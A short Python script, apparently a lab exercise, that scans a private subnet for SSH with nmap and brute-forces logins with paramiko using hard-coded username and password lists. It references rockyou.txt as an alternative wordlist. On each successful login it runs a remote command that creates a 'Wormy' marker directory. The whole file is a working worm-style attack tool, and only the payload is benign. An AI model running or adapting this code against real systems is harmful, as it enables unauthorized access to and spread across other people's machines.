#! /usr/bin/env python3

import nmap
import paramiko
import sys

#defining the variable that calls the port scanner function : nmap
nmScan = nmap.PortScanner()
#defining the local subnet and the target port
nmScan.scan('192.168.197.0/24', '22')
#initializing cmd line method
nmScan.command_line()
#defining a list for the hosts on the subnet
networkhosts = []

#looping through all of the hosts, adding them to the list
for host in nmScan.all_hosts():
    networkhosts.append(host)
print(networkhosts)

#for loop to define the host variable and the wordlists used for brute forcing the password
for element in networkhosts:
    host = element
    port = 22
    usernames = ['sam','gavin','stephen','devin']
    #usernames = /usr/share/wordlists/rockyou.txt
    passwords = ['admin','stephen','penelope','password']
    #passwords = /usr/share/wordlists/rockyou.txt

    #for host in subnet, try various user and password combinations to brute force ssh login to the target devices.
    for user in usernames:
        for pword in passwords:
            username = user
            password = pword
            command = "mkdir Wormy; cd ~/Wormy; touch 'WormyWasHere'"
            #initializing paramiko ssh client by defining the ssh variable
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            try:
                #try to connect to ssh with a user and password combo
                ssh.connect(host, port, username, password, timeout=5)
                stdin, stdout, stderr = ssh.exec_command(command)
                print(host + ' Success :)')
            except:
                #if the login attempt fails, print timeout
                print(host + ' Timeout :(')
